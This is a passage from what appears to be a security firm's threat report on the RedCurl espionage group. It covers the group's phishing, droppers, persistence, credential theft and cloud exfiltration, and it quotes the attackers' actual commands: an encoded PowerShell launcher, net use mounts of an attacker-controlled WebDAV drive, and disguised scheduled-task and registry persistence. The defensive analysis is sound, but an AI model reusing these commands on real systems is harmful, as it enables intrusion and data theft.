{ "id": "f2d4b7ca-43c2-49ec-b616-5abc15f7ab5d", "created_at": "2026-05-05T02:45:36.644787Z", "updated_at": "2026-05-05T02:46:36.971093Z", "deleted_at": null, "sha1_hash": "bbc72124ae50a0e2bdcac05d845716b8f11699af", "title": "", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 9523447, "plain_text": "REDCURL\r\nThe pentest you didn’t know about\r\ngroup-ib.com\r\n AUGUST 2020\n\n2\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT © GROUP−IB\r\n© Group−IB, 2020\r\nRestrictions\r\n1. The report was written by Group-IB experts without any third-party funding.\r\n2. The report provides information on the tactics, tools, and\r\ninfrastructure of the previously unknown group RedCurl. The\r\nreport’s goal is to minimize the risk of the group committing\r\nfurther illegal acts, suppress any such activity in a timely\r\nmanner, and raise awareness among readers. The report also\r\ncontains indicators of compromise that organizations and\r\nspecialists can use to check their networks for compromise,\r\nas well as recommendations on how to protect against future\r\nattacks. Technical details about threats are provided solely\r\nfor information security specialists so that they can familiarize\r\nthemselves with them, prevent similar incidents from occurring\r\nin the future, and minimize potential damage. The technical\r\ndetails about threats outlined in the report are not intended\r\nto advocate fraud or other illegal activities in the field of high\r\ntechnologies or any other fields.\r\n3. The report is for information purposes only and is limited\r\nin distribution. Readers are not authorized to use it for\r\ncommercial purposes and any other purposes not related\r\nto education or personal non-commercial use. Group-IB grants\r\nreaders the right to use the report worldwide by downloading,\r\nreviewing, and quoting it to the extent justified by legitimate\r\ncitation, provided that the report itself (including a link to the\r\ncopyright holder’s website on which it is published) is given\r\nas the source of the quote.\r\n4. The entire report is subject to copyright and protected\r\nby applicable intellectual property law. It is prohibited to copy,\r\ndistribute (including by placing on websites), or use the\r\ninformation or other content without the right owner’s prior\r\nwritten consent.\r\nIf Group-IB’s copyright is violated, Group-IB will have the right\r\nto approach a court or other state institution to protect its\r\nrights and interests and seek punishment for the perpetrator\r\nas provided by law, including recovery of damages.\n\n3\r\n© GROUP−IB\r\nCon t e n t s\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nIntroduction 4\r\nKey findings 6\r\nGeographical scope and targets 8\r\nInitial access 9\r\nTrojan execution and persistence in the system 13\r\nReconnaissance and lateral movement 15\r\nData exfiltration 18\r\nTools 19\r\nInitialDropper 20\r\nDropper 21\r\nFirstStageAgent aka FSA 22\r\nChannel1 aka RedCurl.C1 and Channel2 aka RedCurl.C2 26\r\nCommands 26\r\nAttribution 29\r\nRedCurl, CloudAtlas and RedOctober:\r\ncampaign comparison 30\r\nMITRE ATT\u0026CK® Mapping (RedCurl) 31\r\nMITRE ATT\u0026CK® Mapping\r\n(RedOctober/Cloud Atlas/Inception) 33\r\nIoCs 35\r\nAppendix 1. Cloud accounts* –\r\nAppendix 2. Examples of FSA, C1, and C2 52\r\nRecommendations 55\r\nContents\r\n* The chapter is available in the full version only\n\n4\r\n© GROUP−IB\r\nI n tr odu cti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nIntroduction\r\nOne summer evening in 2019, Group-IB’s Computer Emergency\r\nResponse Team (CERT-GIB) received a call from a new customer\r\nwho said that their company had been attacked. They asked for\r\nhelp in eliminating the incident’s aftermath and identifying the\r\nhacker group responsible.\r\nThe duty CERT-GIB analyst examined the phishing email used\r\nat the initial infection stage. It was particularly well-written, which\r\nsuggested that this was a planned targeted attack. The unique\r\nbehavioral fingerprint — obtained as a result of dynamic analysis\r\nin TDS Polygon, a Group-IB Threat Hunting Framework module,\r\nconfirmed the analyst’s hypothesis. The analyst immediately noti-fied Group-IB’s Threat Intelligence \u0026 Attribution team about the\r\nincident and within a couple of hours the customer was informed\r\nabout the targeted attack against their business.\r\nMeanwhile, the email sample and the attack details caught the\r\nattention of Group-IB’s Threat Intelligence \u0026 Attribution spe-cialists. The campaign conducted by the hacker group (unknown\r\nat the time) involved unique tools written in PowerShell, which\r\nis popular among IT specialists. Moreover, the emails targeted\r\na specific team within the victim organization rather than the orga-nization as a whole. It became obvious that it was not an ordinary\r\ncybercriminal group seeking to steal money. Group-IB specialists’\r\nfindings confirmed earlier forecasts made in the analytical report\r\n“Hi-Tech Crime Trends 2019/2020”: namely that espionage- and\r\nsabotage-oriented APT groups had come to play an increasingly\r\nprominent role on the hacker scene. One such group was the one\r\nin question: RedCurl.\r\nIn each analyzed campaign, the group’s goal was to conduct espi-onage. The attackers infected computers in targeted departments\r\nwithin organizations and stole specific documents. One of the\r\ngroup’s possible victims was an employee at a cybersecurity com-pany that protects its customers against such attacks. Detected\r\nincidents related to this threat group took place in various indus-tries and had a wide geographical scope: from Russia to North\r\nAmerica. As such, it is likely that the attacks were ordered for the\r\npurpose of corporate espionage. This hypothesis is reinforced\r\nby the fact that the group acted as covertly as possible in order\r\nto minimize the risk of being discovered on the victim’s network.\r\nFor instance, RedCurl did not use actively communicating Trojans\r\nor remote administration tools with a graphical interface.\r\nIt should also be noted that RedCurl uses techniques similar\r\nto those used by Red Teaming and penetration testing specialists.\r\nRedCurl\r\nA cyber espionage hacker group\r\nThe group’s goal\r\nis to conduct corporate espionage:\r\nsteal documents containing\r\ncommercially sensitive information\r\nand employees’ personal data\r\nTools\r\nThe group acted as covertly as possible\r\nto minimize the risk of being discovered\r\non the victim’s network: RedCurl did\r\nnot use actively communicating Trojans\r\nor remote administration tools\n\n5\r\n© GROUP−IB\r\nI n tr odu cti o n\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nThis report contains the first ever descriptions of the tactics, tools,\r\nand infrastructure of RedCurl, a previously unknown group. In addi-tion, this paper includes the first ever details about the group’s kill\r\nchain, which were prepared by specialists at Group-IB’s Digital\r\nForensics Lab, as well as unique data collected during incident\r\nresponse operations related to campaigns attributed to RedCurl.\r\nAs part of their research, Group-IB’s digital forensics experts veri-fied the hypothesis that the techniques used by RedCurl are simi-lar to those involved in the RedOctober and CloudAtlas campaigns,\r\nwhose goal is also espionage. An in-depth analysis based on the\r\nMITRE ATT\u0026CK® matrix did not reveal unambiguous links between\r\nthese campaigns, however.\r\nIndicators of compromise are given at the end of the report\r\nas usual, excluding the ones that can lead to the identification\r\nof RedCurl’s victims. YARA and Suricata rules, however, are only\r\navailable to Group‑IB Threat Intelligence \u0026 Attribution customers.\r\nTraditionally, the report features recommendations from\r\nGroup-IB experts on preventive measures to help protect against\r\nthe group’s attacks.\n\n6\r\n© GROUP−IB\r\nK e y fi n d i n g s\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nKey findings\r\nName RedCurl (given by Group-IB)\r\nGoal Corporate espionage and theft of documents\r\nActive 2018 to present. Over more than two years, Group-IB has\r\ndetected 26 targeted attacks\r\nGeography Russia, Ukraine, Canada, Germany, the United Kingdom, Norway\r\nVictims Construction companies, financial and consulting companies,\r\nretailers, banks, insurance companies, law firms, travel agencies\r\nLanguage The group is presumably Russian-speaking\r\nTools RedCurl created a set of PowerShell programs that can cumula-tively be called a framework and that includes:\r\n• Droppers (including an initial dropper, InitialDropper)\r\n• Key module FirstStageAgent (aka FSA)\r\n• Two submodules called Channel1 (aka FSA.C1)\r\nand Channel2 (aka FSA.C2)\r\nFigure 1. Trojan unpacking diagram\r\nThe Trojan receives commands from its operator through a cloud\r\nin the form of BAT scripts, which are simply subprograms. A total\r\nof 29 such command programs were identified.\n\n7\r\n© GROUP−IB\r\nK e y fi n d i n g s\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nFigure. 2. Diagram of Trojan-operator interactions through the cloud\r\nThe group’s technical\r\ncharacteristics\r\n• Minimal use of binary code.\r\n• Use of anti-detection techniques.\r\n• Control over an infected computer through commands kept\r\nin a legitimate cloud storage. The commands are sent as Power-Shell scripts.\r\n• Special scripts for displaying fake Outlook windows to intercept\r\nthe logins and passwords of targeted individuals.\r\n• The group usually remains in the victim’s network for two to six\r\nmonths. The stage of spreading over the network is stretched\r\nover a long time to remain unnoticed for as long as possible.\r\nTo achieve this, the group does not use any actively communi-cating Trojans or remote-control tools via RDP.\r\nTarget system The main targets include office documents and emails.\r\nExfiltration of data\r\nto legitimate cloud\r\nstorage\r\nRedCurl uses cloud services such as cloudme.com, koofr.net,\r\npcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com,\r\npowerfolder.com, docs.live.net, syncwerk.cloud, cloud.woelkli.com,\r\nand framagenda.org. To manage and access clouds, the threat\r\nactors use the service multcloud.com.\r\ninfo\r\ncommands\r\ncheck\r\nexfiltration\n\n8\r\n© GROUP−IB\r\nGeo grap h ica l s c o p e a nd targ e t s\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nGeographical scope\r\nand targets\r\nAll RedCurl attacks are targeted, i.e. emails and droppers are tai-lored to specific victims, which makes it possible to identify targets.\r\nNot all the victims have been identified, however. In some cases,\r\nonly malware modules were discovered (rather than the initial\r\ndropper, which can reveal the target).\r\nSince 2018, Group-IB has detected 26 attacks against targets\r\nin various industries, including:\r\n• Construction companies\r\n• Retailers\r\n• Travel agencies\r\n• Insurance companies\r\n• Financial companies\r\n• Banks\r\n• Law and consulting firms\r\nThe geographical scope of RedCurl attacks includes Europe,\r\nthe post-Soviet region, and North America. The victims of the\r\n26 attacks detected are located in:\r\n• Russia\r\n• Ukraine\r\n• Canada\r\n• Germany\r\n• The United Kingdom\r\n• Norway\r\nGroup-IB identified 14 organizations that have become victims\r\nof RedCurl’s espionage attacks, some on several occasions.\r\nGroup-IB specialists contacted each of them and provided recom-mendations on further steps to eliminate the consequences of the\r\nattacks. Names of victims are not disclosed. At the time of writing,\r\nsome of the companies continue to respond to the incidents.\r\nAnalysis of the customer’s compromised data revealed a set\r\nof data relating to a team lead at a cybersecurity company. The\r\nIP addresses that communicated with RedCurl’s cloud belong\r\nto the company in question. It is impossible to determine whether\r\nthis data was compromised or whether this was an instance\r\nof controlled analysis of the Trojan by researchers.\r\nFigure 3. Timeline\r\nof RedCurl attacks\n\n9\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nInitial access\r\nAs is the case with many espionage campaigns, initial access\r\nto targeted infrastructures in RedCurl attacks involves\r\nspear-phishing emails. RedCurl’s distinctive feature, however,\r\nis that the email content is carefully drafted. For instance, the\r\nemails displayed the targeted company’s address and logo, while\r\nthe sender address featured the company’s domain name.\r\nThe attackers posed as members of the HR team at the targeted\r\norganization and sent out emails to multiple employees at once,\r\nwhich made the employees less vigilant, especially considering\r\nthat many of them worked in the same department.\r\nTo deliver the payload, RedCurl used archives, links to which\r\nwere placed in the email body. Despite the fact that the links\r\nredirected to public cloud storage services, the way they were\r\ndisguised tricked users into thinking that they were visiting the\r\ncompany’s official website:\r\nFigure 4. Example of a spear-phishing email sent by RedCurl\r\nSpear-phishing emails\r\nWere used by the group to get initial\r\naccess to targeted companies\n\n10\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nFigure 5. Example of a spear-phishing email sent by RedCurl\r\nFigure 6. Technical records of the domain mailsecure[.]tech\r\nThe phishing emails were sent using the domain name\r\nmailsecure[.]tech, and more specifically subdomains that imitated\r\nthe target organization’s legitimate domain. The specified domain\r\nname had been registered six months before the campaign was\r\nlaunched, on December 6, 2018. On the day of the attack, the SOA\r\nrecord was changed and Yandex was specified for the MX record:\n\n11\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nNaturally, the websites belonging to the targeted organizations\r\ndid not host the archive, which was stored in the cloud, most\r\noften Dropbox. In addition to Dropbox, RedCurl’s campaigns also\r\ninvolved free hosting services, especially Byethost and AttractSoft:\r\nhttp://********.byethost22.com/3/%D0%9F%D0%BE%D0%BB%D0%BE%D0\r\n%B6%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BE%20%D0%B5%D0%B6%D0%B5%D0%\r\nB3%D0%BE%D0%B4%D0%BD%D0%BE%D0%BC%20%D0%BF%D1%80%D0%B5%D0%BC%\r\nD0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B8%20%D1%81%D0\r\n%BE%D1%82%D1%80%D1%83%D0%B4%D0 %BD%D0%B8%D0%BA%D0%BE%D0%B2.7z\r\nhttp://********.byethost7.com/dl/********.7z\r\nhttp://logs99.atwebpages.com/********/reports/\r\n002838177363613567218367647/actual/report.php\r\nhttp://mtpon34.myartsonline.com/report/2890000027835616636545613/\r\nactual/report.php\r\nAttacks carried out in 2020 involved LNK and XLAM files. The\r\nlatter are add-in files for Excel 2010 and Excel 2007 based on XML\r\nwith support for macros. As victims interacted with these files,\r\nan attacker-controlled cloud storage was set up on the local\r\nsystem as a network drive and launched RedCurl.Dropper, which\r\nwas hosted there, after which a phishing document was displayed\r\nto the victim.\r\nIn the attacks observed in 2019, victims downloaded an archive\r\nwith an EXE file, which was an SFX (self-extracting) archive.\r\nLaunching this file extracted and launched RedCurl.Dropper.\r\nThe launched file had a PDF or Microsoft Word icon, which meant\r\nthat if showing file extensions was disabled on the victim’s com-puter, there was a good chance that the file would not raise any\r\nsuspicions.\r\nIn RedCurl’s earlier campaigns carried out in 2018, the utility\r\nNirCmd was extracted from the SFX archive. NirCmd was used\r\nto launch the module FirstStageAgent_light. In addition to the\r\nSFX archive, RedCurl used MHT files, which were HTML pages with\r\nresources necessary for displaying the contents correctly. When\r\nsuch a file was opened in the browser, the user was asked to allow\r\ninteraction between ActiveX and parts of the web page:\r\nFigure 7. Example\r\nof a downloaded\r\nfile with the\r\nextension made\r\ninvisible\r\nFigure 8. MHT InitialDropper\r\nLNK, XLAM — 2020\r\nEXE — 2019\r\nfiles launched RedCurl.Dropper\r\non the victim’s computer\n\n12\r\n© GROUP−IB\r\nI n itia l acc ess\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nIn the case of an MHT file, RedCurl.FirstStageAgent was launched\r\nusing Windows PowerShell. In addition, the contents of the phish-ing document or web page were displayed.\r\nRedCurl.FirstStageAgent was distributed in a similar way, using\r\nJavaScript. When it was launched, the victim was shown a legit-imate web page that asked them to download, install, or re-in-stall Microsoft 365 or Office 2019. A detailed description\r\nof RedCurl’s toolset can be found in the “Tools” section.\r\nFigure 9. Types of Trojans in 2018, 2019, and 2020\r\n2019--2020\r\n2018\n\n13\r\n© GROUP−IB\r\nT ro j an exec u tion and persistence in   the system\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nTrojan execution\r\nand persistence\r\nin the system\r\nThe vast majority of tools used in RedCurl campaigns are Windows\r\nPowerShell scripts. For instance, a PowerShell script was used\r\nto launch RedCurl.Dropper and set up cloud storage as a network\r\ndrive. Below is one such example:\r\npowershell.exe -enc\r\n“JgAgACIAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgAgAEAAKAAiAHMAZABtAD\r\nUALgBkAGwAbAAsAG8AQgBTAGkAUQBTAFUASQBTAHIAUwB5AE4AYQBJAGEAagBQA\r\nHAAaQBWAFUAUQBCAE0AZwBBACIAKQA7ACAAbgBlAHQAIAB1AHMAZQAgAGgAdAB0\r\nAHAAcwA6AC8ALwBhAHAAcAAuAGsAbwBvAGYAcgAuAG4AZQB0AC8AZABhAHYAIAB\r\nuADYAegByAHMAcwA5AGQAbwBxAG8AagA2AGkAdQAxACAALwB1AHMAZQByADoAZg\r\nBvAHkAdQBiAEAAdABoAGUAdABlAG0AcABtAGEAaQBsAC4AYwBvAG0AOwAgAG4AZ\r\nQB0ACAAdQBzAGUAIABcAFwAYQBwAHAALgBrAG8AbwBmAHIALgBuAGUAdABAAFMA\r\nUwBMAFwAZABhAHYAIAAvAEQARQBMAEUAVABFADsA”\r\n“rundll32.exe” @(“sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA”);\r\nnet use https://app.koofr.net/dav PASSWORD\r\n/user:foyub@thetempmail.com;\r\nnet use \\\\app.koofr.net@SSL\\dav /DELETE;\r\nThe above script is saved in a batch file and launched after the\r\nphishing SFX archive is opened using a VBScript script. Module\r\npersistence is sometimes established during the SFX archive\r\nopening stage. In such cases, a shortcut with a module launch\r\ncommand is created in the Startup directory.\r\nRedCurl.Dropper, which is a library, is launched using\r\nrundll32.exe. RedCurl.FSA and the additional modules\r\nRedCurl.FSA.C1 and RedCurl.FSA.C2, on the other hand,\r\nare extracted from a CAB archive.\r\nIn earlier attacks that took place in 2018, the additional modules\r\nChannel1 and Channel2 were downloaded from the cloud. In the\r\nmost recent attacks, the modules were located in the same CAB\r\narchive as FirstStageAgent, while RedCurl.Dropper itself was\r\nlaunched from a network drive set up during the initial access\r\nstage.\r\nThese tools helped the attackers download additional PowerShell\r\nscripts (as well as other tools necessary for achieving specific\r\ngoals) from cloud storage spaces and execute them. A detailed\r\ndescription of the main and additional modules can be found in the\r\n“Tools” section.\r\nPersistence for both the main and additional modules was estab-lished by creating scheduled tasks:\r\n/c schtasks /Create /TN “LicenseAcquisitionService\\\r\nEnableLicenseAcquisitionTask” /SC hourly /ST 02:26 /\r\ntr “wscript.exe /B \\”C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\\r\nEnableLicenseAcquisitionS\\EnableLicenseAcquisitionF.vbs\\”” /F\n\n14\r\n© GROUP−IB\r\nT ro j an exec u tion and persistence in   the system\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nIn earlier attacks, persistence was ensured also through the Run\r\nkeys in the Registry:\r\nNew-ItemProperty -Path Registry::HKCU\\Software\\Microsoft\\\r\nWindows\\CurrentVersion\\Run -Name MicrosoftCurrentUpdatesCheck\r\n-Value “””$Channel1Dir\\check.exe”” loop 65000 3600000 execmd\r\n“”cd “”$Channel1Dir”” \u0026\u0026 call check.bat””” -Force | Out-Null\r\nThe names of both scheduled tasks and Registry keys were\r\ndesigned in such a way so as to make it extremely difficult\r\nto distinguish them from legitimate operating system com-ponents and applications: MicrosoftCurrentUpdatesCheck,\r\nMDMMaintenenceTask, WindowsActionDialog, etc.\n\n15\r\n© GROUP−IB\r\nR econnaissance and   lateral movement\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nReconnaissance\r\nand lateral movement\r\nAnalysis of RedCurl campaigns revealed that the group remains\r\nin the victim’s network for two to six months on average. The stage\r\nof spreading over the network is significantly extended in time\r\nas the group strives to remain unnoticed for as long as possi-ble and does not use any active Trojans that could disclose its\r\npresence.\r\nBy using Windows PowerShell scripts and legitimate cloud ser-vices, RedCurl reduced detections of the tools they used\r\nto the minimum. As part of incident response operations,\r\nGroup-IB specialists observed antivirus software being triggered\r\nby RedCurl.Dropper, but this occurred only after the malware had\r\nbeen in the system for several months.\r\nThe attackers also used Windows PowerShell scripts to collect\r\ninformation about the compromised system as well as about local\r\nand network drives:\r\nThe same scripts were also used to collect information about\r\nemail accounts that could later be used for a new round of phish-ing campaigns.\r\nFor 2 to 6 months\r\nRedCurl remains in the victim’s network\r\nAs part of its campaigns, RedCurl used ADExplorer from the\r\nSysinternals Suite to collect information about Active Directory:\n\n16\r\n© GROUP−IB\r\nR econnaissance and   lateral movement\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nIn RedCurl campaigns, movement across the network was\r\nensured using modified LNK files (shortcuts), which were placed\r\nin network drives.\r\nAlthough this tool is intended for working with a graphical inter-face, the snapshot option makes it possible to launch it from the\r\ncommand line and save a copy of the Active Directory database\r\nto a file.\r\nUnlike many other espionage groups, RedCurl does not seek\r\nto gain access to systems using the Remote Desktop Protocol\r\nor similar. Instead, the group sticks to tools with a command line\r\ninterface using SSH for interactive access, for example.\r\nBy using a Windows PowerShell script, the attackers created LNK\r\nshortcuts for *.jpg, *.pdf, *.doc, *.docx, *.xls, and *.xlsx files hosted\r\non network drives and turned on the “hidden” attribute for the original\r\nfiles. By merely opening a target file, the unsuspecting victim would\r\nlaunch RedCurl.Dropper together with it.\r\nRedCurl.Dropper was also copied to the directory where the files\r\nwere located on the network drive. Although this propagation method\r\nis “low and slow,” it helps threat actors successfully bypass certain\r\nsecurity systems.\r\nLNK files\r\nUsed by RedCurl to substitute *.jpg,\r\n*.pdf, *.doc, *.docx, *.xls, and *.xlsx files.\r\nBy opening such a file, the victim would\r\nlaunch RedCurl.Dropper\n\n17\r\n© GROUP−IB\r\nR econnaissance and   lateral movement\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nOn account of this particular characteristic of LNK files, specialists\r\nat Group-IB’s Digital Forensics Lab were able to determine that these\r\nfiles had been opened by analyzing UserAssist, a source of artifacts\r\ntraditionally used to search for traces of executable file launches and\r\nthat normally does not contain such traces.\r\nIn addition to Windows PowerShell scripts, RedCurl’s arsenal\r\nincludes other tools. To harvest credentials, for instance, the attack-ers use an increasingly popular tool called LaZagne, which helps\r\nextract passwords not only from memory but also from files, such\r\nas those saved in the victim’s browser. This tool is written in Python\r\nand is delivered to compromised hosts together with the Python\r\ninterpreter. To reduce the likelihood of LaZagne being detected, the\r\nattackers used PyArmor, which helped obfuscate its code.\r\nLaZagne\r\nThe tool used by RedCurl to extract\r\npasswords not only from memory but\r\nalso from files, such as those saved\r\nin the victim’s browser\r\nMoreover, a PowerShell script that displayed a phishing\r\npop-up Microsoft Outlook window to the victim was used to collect\r\nauthentication data.\r\nCredentials entered by the user were saved to a text file and then\r\nchecked for validity. This way, if a targeted organization did not\r\nhave multi-factor authentication in place, the attackers could gain\r\naccess to compromised users’ email accounts even if the required\r\ndata was not obtained through LaZagne.\r\nPyArmor\r\nused by RedCurl to reduce the likelihood\r\nof RedCurl.Dropper being detected and\r\nobfuscate its code\n\n18\r\n© GROUP−IB\r\nD ata exfiltration\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nData exfiltration\r\nRedCurl focuses on compromising email. The attackers had\r\na Windows PowerShell script in their arsenal to exfiltrate and\r\ncopy emails.\r\nApart from scripts, in some cases the hackers also used other\r\ntools to upload files to cloud services. In particular, they used the\r\nmegatools set of utilities to upload data to Mega, a file storage\r\nservice.\r\nThe hackers searched both local drives and corporate network\r\nstorages for documents of interest. Among the stolen files were:\r\n• Employee personnel files\r\n• Construction documentation\r\n• Legal action documents\r\n• Internal documents\n\n19\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nTools\r\nThe entire set of the group’s custom tools is written in PowerShell.\r\nWhen these tools are in operation, third-party programs are\r\nadditionally downloaded, including ones written in Python.\r\nRedCurl’s custom tools include:\r\n• RedCurl.InitialDropper\r\n• RedCurl.Dropper\r\n• RedCurl.FSA aka FirstStageAgent\r\n• RedCurl.FSA.C1 + RedCurl.FSA.C2\r\n• RedCurl.Commands\r\nFigure 10. Diagram showing FSA with its modules and commands\r\nPowerShell\r\nThe entire set of RedCurl’s custom\r\ntools is written in PowerShell\n\n20\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nInitialDropper The initial dropper RedCurl.InitialDropper is a regular SFXRAR\r\nor 7z archive with a PDF icon. This has not always been the case,\r\nhowever. Analysis of historical data revealed:\r\n• VBS_Dropper, a VBS script\r\n• XLAM_Dropper, an MS Office add-in file\r\n• LNK_Dropper, an MS Windows shortcut\r\nLaunching it will unpack a decoy document, a malicious DLL\r\nlibrary called RedCurl.Dropper, a VBS script, and a BAT command\r\nshell script.\r\nThe user will be shown the decoy document while the system utility\r\nwscript.exe executes the extracted VBS script, which launches the\r\ncmd.exe command line interpreter and the extracted BAT script.\r\nFigure 11. Contents of SFX InitialDropper\r\nFigure 12. SFX InitialDropper diagram\r\nThis will result in the launch of a PowerShell script that will set\r\nup a cloud storage as a network drive using the system utility net.exe:\r\nnet use \\\\app.koofr.net@SSL\\dav /DELETE;\r\nnet use https://app.koofr.net/dav PASSWORD\r\n/user:foyub@thetempmail.com;\r\nNext, the script will use the system utility rundll32.exe to launch the\r\ndropper as the malicious library RedCurl.Dropper:\r\n“rundll32.exe” @(“sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA”);\n\n21\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nDropper When Dropper is launched, tasks are created, which ensures the\r\npersistence of the key module RedCurl.FSA and the two “chan-nels,” RedCurl.FSA.C1 and RedCurl.FSA.C2.\r\nC:\\Windows\\System32\\cmd.exe\r\n/c schtasks /Create /TN «WsSwapAssessmentTask» /SC hourly /\r\nMO 4 /ST 00:20 /tr «wscript.exe /B \\»C:\\Users\\John\\AppData\\Local\\\r\nMicrosoft\\WsSwapAssessmentTaskF\\WsSwapAssessmentTaskS.vbs\\»» /F\r\nC:\\Windows\\System32\\cmd.exe /c schtasks /Create /\r\nTN «IndexerAutomaticMaintenance\\IndexerAutomaticMaintenanceTask» /\r\nSC hourly /ST 01:38 /tr «wscript.exe /B \\»C:\\Users\\John\\AppData\\\r\nRoaming\\IndexerAutomaticMaintenanceF\\IndexerAutomaticMaintenance.\r\nvbs\\»» /F\r\nC:\\Windows\\System32\\cmd.exe /c schtasks /Create /\r\nTN «LicenseAcquisitionService\\EnableLicenseAcquisitionTask» /\r\nSC hourly /ST 02:13 /tr «wscript.exe /B \\»C:\\Users\\John\\AppData\\\r\nRoaming\\Microsoft\\EnableLicenseAcquisitionS\r\nEnableLicenseAcquisitionF.vbs\\»» /F\r\nThe program then extracts and saves a CAB archive to the disk,\r\ncreates a new directory, and unpacks the contents of the CAB\r\narchive into that directory.\r\nThe archive contains the 7-Zip utility, which has traditionally\r\nbeen used to create and unpack archives. All command mod-ules are encrypted using 7-Zip, which is also actively used\r\nby RedCurl’s Trojan. The archive also contains a utility called curl,\r\nwhich sends requests and ensures communication with the\r\nC\u0026C server.\r\nFigure 13. Contents of the CAB file\n\n22\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nFirstStageAgent\r\naka FSA\r\nFirstStageAgent is designed to perform the following functions:\r\n1. Extract the modules RedCurl.Channel1 and RedCurl.Channel2.\r\n2. Upload information about the infected machine.\r\n3. Download and execute a new command (module).\r\nThe FSA key module connects to the cloud service to upload data\r\nand obtain commands. The commands are sent as BAT scripts, the\r\nbody of which usually contains a PowerShell script or an encoded\r\nexecutable file and launch instructions.\n\n23\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\n Download of a module with commands\r\nLaunch of a decrypted version of the BAT file using a VBS\r\nscript (this step may be omitted)\r\nLaunch of the BAT file\r\n Launch of the main part of the module\r\nAlong with the FSA key module, two auxiliary modules are installed:\r\nFSA.Channel1 aka C1 and FSA.Channel2 aka C2. They act in the\r\nsame way as the key module, but they use different accounts\r\nto communicate with the cloud.\r\nRedCurl uses cloud services such as cloudme.com, koofr.net,\r\npcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com,\r\npowerfolder.com, and docs.live.net.\r\nThe modules RedCurl.Channel1 and RedCurl.Channel2 are stored\r\nin password-protected archives. The key for the archives is con-tained in an encrypted FirstStageAgent file. During the first start,\r\nFirstStageAgent extracts the contents of the archives using the\r\n“syspack.exe” utility. If the operation is successful, the\r\n“syspack.exe”, “7za.dll”, and “curl.exe” files are copied to the\r\ndirectory with the modules. Examples of commands for\r\nextracting content from archives are presented below:\r\n.\\syspack.exe x -aoa -p${fPass} $Channel1_path -o${Channel1Dir};\r\n.\\syspack.exe x -aoa -p${fPass} $Channel2_path -o${Channel2Dir};\r\nThe program communicates with operators by reading and writ-ing to files located in the cloud storage. To interact with the cloud,\r\nFirstStageAgent uses the WebDav technology, which allows for\r\noperations with files over the HTTP protocol. Requests to the\r\ncloud are performed using the “curl.exe” utility. FirstStageAgent\r\nfirst checks for proxy settings. If found, the settings are used\r\nto make requests to the cloud.\r\nFigure 14. FSA operation algorithm\n\n24\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nAll downloads from and uploads to the cloud are carried out\r\nusing the curl utility. Prior to sending, data is encrypted using\r\nthe 7-Zip utility.\r\nBefore obtaining commands, FirstStageAgent logs\r\nthe start time. To do so, the program adds the user-name as well as the current date and time to the end\r\nof the file “SYS\\${env:computername}.[jpg|txt]” located\r\non the cloud service. The message is formed by the command\r\n“${env:username}_$(Get-Date -Format g)”. To perform the above\r\nactions, FirstStageAgent takes the following steps:\r\n1. Downloads the file “SYS\\${env:computername}.[jpg|txt]”\r\nto the folder with the module.\r\n2. Adds the username as well as the current time and date\r\nto the end of the file.\r\n3. Deletes the file “SYS\\${env:computername}.[jpg|txt]”\r\nfrom the cloud.\r\n4. Downloads the modified file\r\n“SYS\\${env:computername}.[jpg|txt]”.\r\n5. Removes the downloaded file from the system.\r\nIt is worth noting that modules are stored on the infected sys-tem in encrypted form. The modules are encrypted using the\r\nConvertTo-SecureString function based on the AES algorithm.\r\nA random sequence of bytes is used as a key. The decryption key\r\nis always new for each attack and each module.\r\ninfo\r\ncommands\r\ncheck\r\nexfiltration\r\nFigure 15. Diagram of Trojan-operator interactions through the cloud\n\n25\r\n© GROUP−IB\r\nTools\r\nREDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT\r\nThe final stage of FirstStageAgent’s operation is to check for the\r\nfile “enc/cmd.txt”, which contains a new module with commands.\r\nThe file stored on the server is a System.Security.SecureString\r\nobject. The ConvertTo-SecureString method is used to decrypt the\r\nmodule. The decryption key is located within the FirstStageAgent\r\nfile. Analysis revealed that a new encryption key is generated for\r\neach attack. Apart from encryption, the data is 